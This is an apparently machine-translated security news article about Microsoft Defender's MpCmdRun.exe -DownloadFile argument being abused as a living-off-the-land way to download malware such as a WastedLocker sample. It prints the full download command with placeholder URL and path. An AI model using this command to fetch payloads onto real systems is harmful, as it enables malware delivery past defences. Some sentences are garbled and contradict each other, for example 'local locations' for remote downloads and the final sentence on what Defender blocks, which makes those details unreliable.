Flaw in Microsoft Defender allows downloading any file, even virus, from a remote server

Security flaws are sometimes caused by products that should prevent attacks. Cybersecurity specialists detected a flaw in a Microsoft Defender update for Windows 10 that would allow the download of malware and other malicious files on the compromised system.

Exploiting this flaw would allow threat actors to deploy subsequent attacks, mainly from the variant known as living-off-the-land. Apparently the flaw is related to the MpCmdRun.exe command line, which has been abused to download malicious files from remote locations. This is an issue that has affected many other applications for Windows systems.

The flaw was reported by computer security expert Mohammad Askar, who mentions that the latest Update to Microsoft Defender includes a new argument identified as -DownloadFile. This new feature allows local users to use a Microsoft Antimalware command-line utility to download files from local locations using the following command:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

BleepingComputer experts performed multiple tests, detecting that the feature was included in versions 4.18.2007.9 or 4.18.2009.9.

Esta imagen tiene un atributo ALT vacío; su nombre de archivo es microsoftdefender0309202001.jpg

During testing experts managed to download a resources.exe file, a sample of the WastedLocker ransomware variant used in a recent cyberattack.

Esta imagen tiene un atributo ALT vacío; su nombre de archivo es microsoftdefender0309202002.jpg

Fortunately it is not all bad news, as this flaw does not prevent Microsoft Defender from downloading downloaded malicious files abusing MpCmdRun.exe, although it is not yet checked if other antivirus solutions allow the program to elude its restrictions. At the moment Microsoft has not commented on the finding, although it is likely not to be considered as a security flaw.